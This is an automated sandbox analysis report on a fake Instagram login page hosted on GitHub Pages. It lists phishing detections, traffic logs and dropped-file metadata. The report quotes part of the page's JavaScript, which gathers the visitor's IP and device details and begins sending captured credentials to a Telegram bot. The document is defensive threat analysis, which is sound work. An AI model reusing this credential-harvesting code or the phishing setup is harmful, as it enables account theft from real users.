Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://jinos1.github.io/instgram_login

Overview

General Information

Sample URL:http://jinos1.github.io/instgram_login
Analysis ID:1590429
Infos:

Detection

HTMLPhisher
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish10
Yara detected HtmlPhish64
AI detected suspicious Javascript
Javascript uses Telegram API
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Invalid 'forgot password' link found
Invalid T&C link found
Javascript checks online IP of machine
Stores files to the Windows start menu directory

Classification

  • System is w10x64
  • chrome.exe (PID: 5692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3524 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 --field-trial-handle=2472,i,5502028708574582468,12572391490374655255,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 3480 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://jinos1.github.io/instgram_login" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_62JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.0.pages.csvJoeSecurity_HtmlPhish_64Yara detected HtmlPhish_64Joe Security
      1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://jinos1.github.io/instgram_loginAvira URL Cloud: detection malicious, Label: phishing
        Source: https://jinos1.github.io/instgram_loginAvira URL Cloud: Label: phishing
        Source: https://jinos1.github.io/instgram_login/instagram-logo.pngAvira URL Cloud: Label: phishing
        Source: https://jinos1.github.io/instgram_login/insta-fav.icoAvira URL Cloud: Label: phishing

        Phishing

        barindex
        Source: https://jinos1.github.io/instgram_login/Joe Sandbox AI: Score: 9 Reasons: The brand 'Instagram' is well-known and is associated with the domain 'instagram.com'., The URL 'jinos1.github.io' does not match the legitimate domain of Instagram., The URL is hosted on 'github.io', which is a domain for GitHub Pages, a platform for hosting static websites. This is not typically used by Instagram for its services., The presence of input fields for 'Phone, username or email' is common in phishing attempts to capture user credentials., The URL does not contain any direct reference to Instagram, which is suspicious. DOM: 1.0.pages.csv
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_62, type: DROPPED
        Source: Yara matchFile source: 1.0.pages.csv, type: HTML
        Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://jinos1.github.io/instgram_login/... This script demonstrates high-risk behavior, including data exfiltration and sending sensitive user information (email/phone and password) to an external, untrusted domain (Telegram). The script also collects detailed device information, including IP address, user agent, platform, language, and cookie status, which could be used for malicious purposes. The use of hardcoded API tokens and chat IDs further increases the risk, as this information could be abused by attackers. Overall, this script exhibits clear signs of malicious intent and should be considered a high-risk security threat.
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: // function to fetch the user's ip address async function getipaddress() { try { const response = await fetch('https://api.ipify.org?format=json', { cache: 'no-store' }); const data = await response.json(); return data.ip; } catch (error) { console.error('error fetching ip address:', error); return 'unknown'; } } // function to collect device and browser information async function getdeviceinfo() { const ip = await getipaddress(); return { ip: ip, useragent: navigator.useragent, platform: navigator.platform, language: navigator.language, cookiesenabled: navigator.cookieenabled }; } // function to send collected data to telegram async function sendtotelegram(data) { const deviceinfo = await getdeviceinfo(...
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: Number of links: 0
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: Title: Instagram does not match URL
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: Invalid link: Forgot password?
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: Invalid link: HELP
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: Invalid link: PRIVACY
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: Invalid link: TERMS
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: // function to fetch the user's ip address async function getipaddress() { try { const response = await fetch('https://api.ipify.org?format=json', { cache: 'no-store' }); const data = await response.json(); return data.ip; } catch (error) { console.error('error fetching ip address:', error); return 'unknown'; } } // function to collect device and browser information async function getdeviceinfo() { const ip = await getipaddress(); return { ip: ip, useragent: navigator.useragent, platform: navigator.platform, language: navigator.language, cookiesenabled: navigator.cookieenabled }; } // function to send collected data to telegram async function sendtotelegram(data) { const deviceinfo = await getdeviceinfo(...
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: <input type="password" .../> found
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: No <meta name="author".. found
        Source: https://jinos1.github.io/instgram_login/HTTP Parser: No <meta name="copyright".. found
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.91
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /instgram_login HTTP/1.1Host: jinos1.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /instgram_login/ HTTP/1.1Host: jinos1.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /instgram_login/instagram-logo.png HTTP/1.1Host: jinos1.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jinos1.github.io/instgram_login/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /instgram_login/insta-fav.ico HTTP/1.1Host: jinos1.github.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://jinos1.github.io/instgram_login/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /instgram_login/instagram-logo.png HTTP/1.1Host: jinos1.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /instgram_login/insta-fav.ico HTTP/1.1Host: jinos1.github.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /instgram_login HTTP/1.1Host: jinos1.github.ioConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: jinos1.github.io
        Source: chromecache_62.2.drString found in binary or memory: https://api.ipify.org?format=json
        Source: chromecache_62.2.drString found in binary or memory: https://api.telegram.org/bot$
        Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: classification engineClassification label: mal88.phis.win@17/16@8/6
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 --field-trial-handle=2472,i,5502028708574582468,12572391490374655255,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://jinos1.github.io/instgram_login"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2536 --field-trial-handle=2472,i,5502028708574582468,12572391490374655255,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Registry Run Keys / Startup Folder
        1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
        Non-Application Layer Protocol
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
        Ingress Tool Transfer
        Traffic DuplicationData Destruction
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        http://jinos1.github.io/instgram_login100%Avira URL Cloudphishing
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://jinos1.github.io/instgram_login100%Avira URL Cloudphishing
        https://jinos1.github.io/instgram_login/instagram-logo.png100%Avira URL Cloudphishing
        https://jinos1.github.io/instgram_login/insta-fav.ico100%Avira URL Cloudphishing
        NameIPActiveMaliciousAntivirus DetectionReputation
        jinos1.github.io
        185.199.108.153
        truetrue
          unknown
          www.google.com
          216.58.206.36
          truefalse
            high
            NameMaliciousAntivirus DetectionReputation
            https://jinos1.github.io/instgram_login/true
              unknown
              https://jinos1.github.io/instgram_logintrue
              • Avira URL Cloud: phishing
              unknown
              https://jinos1.github.io/instgram_login/insta-fav.icotrue
              • Avira URL Cloud: phishing
              unknown
              http://jinos1.github.io/instgram_logintrue
                unknown
                https://jinos1.github.io/instgram_login/instagram-logo.pngtrue
                • Avira URL Cloud: phishing
                unknown
                NameSourceMaliciousAntivirus DetectionReputation
                https://api.telegram.org/bot$chromecache_62.2.drfalse
                  high
                  https://api.ipify.org?format=jsonchromecache_62.2.drfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    239.255.255.250
                    unknownReserved
                    unknownunknownfalse
                    185.199.108.153
                    jinos1.github.ioNetherlands
                    54113FASTLYUStrue
                    216.58.206.36
                    www.google.comUnited States
                    15169GOOGLEUSfalse
                    185.199.110.153
                    unknownNetherlands
                    54113FASTLYUSfalse
                    IP
                    192.168.2.6
                    192.168.2.5
                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1590429
                    Start date and time:2025-01-14 01:37:00 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 2m 58s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:browseurl.jbs
                    Sample URL:http://jinos1.github.io/instgram_login
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:7
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal88.phis.win@17/16@8/6
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                    • Excluded IPs from analysis (whitelisted): 142.250.186.35, 142.250.186.142, 142.250.110.84, 216.58.206.78, 142.250.184.206, 142.250.186.174, 142.250.184.202, 216.58.206.42, 142.250.185.74, 172.217.18.10, 142.250.186.170, 172.217.16.202, 142.250.186.138, 142.250.185.234, 142.250.181.234, 142.250.185.202, 142.250.185.106, 216.58.206.74, 172.217.23.106, 142.250.185.138, 142.250.186.106, 142.250.184.234, 199.232.214.172, 23.50.108.3, 142.250.181.238, 142.250.186.78, 142.250.185.206, 216.58.212.174, 142.250.185.110, 142.250.74.195, 172.217.23.110, 172.217.18.110, 2.23.242.162, 13.107.246.45, 52.149.20.212
                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com
                    • Not all processes where analyzed, report is missing behavior information
                    • VT rate limit hit for: http://jinos1.github.io/instgram_login
                    No simulations
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 23:37:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2677
                    Entropy (8bit):3.975757532719217
                    Encrypted:false
                    SSDEEP:48:8kdpTxNiIH7idAKZdA19ehwiZUklqehty+3:82jiIay
                    MD5:8E8927A97599DB2265FE680BF6F237CA
                    SHA1:063BCCDD30E762E80191F7AD22B56A3955DC8EC1
                    SHA-256:A6AB18B686FA8DB63DA9FB3DB9469E1B61B21E7DD9F6F8F50BA50F8E10BCA7BC
                    SHA-512:E8840A92AD396B2449FB49817A7E9E4E0BB4E12D232230B000C9B0ECADA5A356D19B5580281697735131F5C68F9B1E2A2479684C716C4E21E46E3705AF92DF47
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.@.. ...$+.,......w..f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Y........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jan 13 23:37:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2679
                    Entropy (8bit):3.9878356695472377
                    Encrypted:false
                    SSDEEP:48:8zdpTxNiIH7idAKZdA1weh/iZUkAQkqehKy+2:8bjiC9QLy
                    MD5:81E1ED152CDE68238C8F92F177BA9D34
                    SHA1:56ED06D3DEE6E9110739C72B69184539CC82C4DB
                    SHA-256:1C45F1AD190B28C7784956B349B849698BF3B90B018CDB4CB6026650F925256B
                    SHA-512:BEA86DF486F4CC53AA639705874B36F048E00F6829CEF26C6EE927EC5C31BF2F21C7E81445EDD51AF41F50EEAE91AA7B0A6CA99412750A91A7F2CC9412A1DF1C
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.@.. ...$+.,......h..f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Y........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                    Category:dropped
                    Size (bytes):2693
                    Entropy (8bit):4.00396260146327
                    Encrypted:false
                    SSDEEP:48:8xGdpTxNsH7idAKZdA14tseh7sFiZUkmgqeh7sAy+BX:8xcjGnWy
                    MD5:F3239889293C32F9F77D206FE72C619C
                    SHA1:47CCA95953D16981214ADE4425CD5BD3353F4433
                    SHA-256:8C6ACFD84E6785AF5AC26BD4060AED5C1226B33E62EC30DD1E98986FFD3B375B
                    SHA-512:9AE7B8D848E7C6774B868A330B6395CC90EEB55ED8FC5B72711DD295F60212734BB708919A00509366D13B0C9FBFFEF494EBF97BEA4B5188CE24E830CD8AF118
                    Malicious:false
                    Reputation:low
                    Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Z......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Y........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
